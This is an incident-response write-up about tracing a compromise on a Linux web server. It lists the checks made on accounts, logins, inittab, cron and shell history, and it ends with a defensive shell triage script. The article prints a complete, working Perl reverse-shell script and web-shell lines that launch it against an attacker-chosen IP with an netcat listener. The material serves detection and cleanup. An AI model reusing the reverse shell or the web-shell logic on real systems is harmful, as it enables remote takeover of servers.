2025-03-17 Update From: SLTechnology News&Howtos, Shulou (Servers)
Shulou (Shulou.com) 06/01 Report
This article describes how a virus was tracked down on a web server. The write-up is quite detailed and has some reference value, so interested readers should read on.
A server was suspected of having been hijacked to serve injected content: searching Baidu for the site returned results that were mostly ×× websites.
I logged in to the server immediately (it was the middle of the night and I was sleepy) and went through the following steps:
1. Check the system accounts for anything abnormal, such as an account that impersonates a system account by changing a single letter so that it looks legitimate and confuses the reader. Some attackers are cunning and create an account called "…", which is extremely hard to notice.
2. Check the IP addresses of recently logged-in users with last, looking at everything since September 9. It was confirmed that one login came from an IP it should not have.
3. Check the system initialization file inittab at run level 3 for anything abnormal. Some attackers like to work here, adding a line with the respawn action so that their program restarts automatically after being killed and keeps fighting the administrator's attempts to stop it.
4. Check the scripts in the run-level directory with ls -al /etc/rc3.d; nothing abnormal was found.
5. Check the scheduled tasks with crontab -l, once for the root user and once for the web user www; nothing abnormal was found.
6. Check the shell history with history and find that sendmail was installed. Ask the customer whether they did this. Answer: they did not install it themselves.
7. Check the web directory and find that its permissions are 777, which is not reassuring. I suspect this may be where the attacker started.
8. Check the /tmp directory and find a suspicious file named spider_bc. Opening it shows a Perl script with the following contents:
[root@localhost mysql]# more /tmp/spider_bc
#!/usr/bin/perl
use Socket;
$cmd = "lynx";
$system = 'echo "`uname -a`"; echo "`id`"; /bin/sh';
$0 = $cmd;                      # disguises the process name as "lynx" in ps output
$target = $ARGV[0];             # remote host and port are taken from the command line
$port = $ARGV[1];
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");        # shell input and output are attached to the outbound socket
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
According to the customer's developer, the file reappeared automatically after it was deleted.
9. The initial suspicion was that the attacker had uploaded a program through the lax web permissions and a vulnerability in the site code, and that this program regenerated the file. So I went to the website's root directory and ran grep -r "spider" *. After a moment the result came out; an excerpt follows:
[root@localhost www]# grep spider_bc * -r
/plusbak/viev.php: echo File_Write('/tmp/spider_bc', base64_decode($back_connect_pl), 'wb') ? 'created /tmp/spider_bc successful' : 'Failed to create /tmp/spider_bc';
/plusbak/viev.php: echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'failed to execute command';
/plusbak/viev.php: echo File_Write('/tmp/spider_bc.c', base64_decode($back_connect_c), 'wb') ? 'created /tmp/spider_bc.c successful' : 'Failed to create /tmp/spider_bc.c';
/plusbak/viev.php: @unlink('/tmp/spider_bc.c');
/plusbak/viev.php: echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'failed to execute command';
/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.php: echo File_Write('/tmp/spider_bc', base64_decode($back_connect_pl), 'wb') ? 'created /tmp/spider_bc successful' : 'Failed to create /tmp/spider_bc';
/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.php: echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'failed to execute command';
/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.php: echo File_Write('/tmp/spider_bc.c', base64_decode($back_connect_c), 'wb') ? 'created /tmp/spider_bc.c successful' : 'Failed to create /tmp/spider_bc.c';
/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.php: @unlink('/tmp/spider_bc.c');
/developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths.php: echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'failed to execute command';
/developers/developers/cache/default/index_sql.php: echo File_Write('/tmp/spider_bc', base64_decode($back_connect_pl), 'wb') ? 'created /tmp/spider_bc successful' : 'Failed to create /tmp/spider_bc';
/developers/developers/cache/default/index_sql.php: echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'failed to execute command';
/developers/developers/cache/default/index_sql.php: echo File_Write('/tmp/spider_bc.c', base64_decode($back_connect_c), 'wb') ? 'created /tmp/spider_bc.c successful' : 'Failed to create /tmp/spider_bc.c';
/developers/developers/cache/default/index_sql.php: @unlink('/tmp/spider_bc.c');
/developers/developers/cache/default/index_sql.php: echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'failed to execute command';
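To make the checks from steps 1, 3, 7 and 9 repeatable, here is a small POSIX shell triage helper added for this write-up; it is not from the article or its author. Each function takes a file or directory path, the passwd, inittab and web-root contents it runs against are constructed samples embedded in the script, and the marker strings it greps for are the ones that appeared in the grep output above.

```shell
#!/bin/sh
# Triage helper written for this note (not part of the article): each function
# re-runs one of the article's checks on the file or directory passed as $1, so
# the checks can be exercised offline against the constructed sample data below.

# Step 1: UID 0 accounts other than root (look-alike names such as "root1" hide here).
extra_uid0_accounts() { awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"; }

# Step 3: inittab entries that respawn in run level 3, i.e. restart when killed.
respawn_in_level3() { awk -F: '$3 == "respawn" && $2 ~ /3/ { print $1 ":" $4 }' "$1"; }

# Step 7: world-writable directories below the web root (printed relative to it).
world_writable_dirs() { ( cd "$1" && find . -type d -perm -0002 | sort ); }

# Step 9: PHP files carrying the markers seen in the grep output above
# (a base64_decode of $back_connect_* or a reference to /tmp/spider_bc).
spider_bc_droppers() { ( cd "$1" && grep -rlE 'base64_decode\(\$back_connect|/tmp/spider_bc' . | sort ); }

# Constructed sample data (not from a real system) so the checks run offline.
SAMPLE=$(mktemp -d)
printf 'root:x:0:0:root:/root:/bin/bash\nwww:x:500:500::/var/www:/bin/bash\nroot1:x:0:0::/tmp:/bin/bash\n' > "$SAMPLE/passwd"
printf 'id:3:initdefault:\nl3:3:wait:/etc/rc.d/rc 3\nx1:3:respawn:/tmp/spider_bc 192.0.2.10 80\n' > "$SAMPLE/inittab"
mkdir -p "$SAMPLE/www/plusbak" "$SAMPLE/www/upload"
chmod 0755 "$SAMPLE/www" "$SAMPLE/www/plusbak"
chmod 0777 "$SAMPLE/www/upload"
printf '<?php echo "hello";\n' > "$SAMPLE/www/index.php"
printf '<?php echo File_Write("/tmp/spider_bc", base64_decode($back_connect_pl), "wb");\n' > "$SAMPLE/www/plusbak/viev.php"

# Run every check against a sample root and print its findings under a heading.
run_triage() {
    echo "== extra UID 0 accounts ==";    extra_uid0_accounts "$1/passwd"
    echo "== respawn in run level 3 ==";  respawn_in_level3 "$1/inittab"
    echo "== world-writable web dirs =="; world_writable_dirs "$1/www"
    echo "== spider_bc droppers ==";      spider_bc_droppers "$1/www"
}
run_triage "$SAMPLE"
```

On a live system the same functions can be pointed at /etc/passwd, /etc/inittab and the real web root; a hit from spider_bc_droppers is the file to quarantine before deleting /tmp/spider_bc again.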
That concludes "how to troubleshoot viruses in Web servers". Thank you for reading; I hope the content is helpful.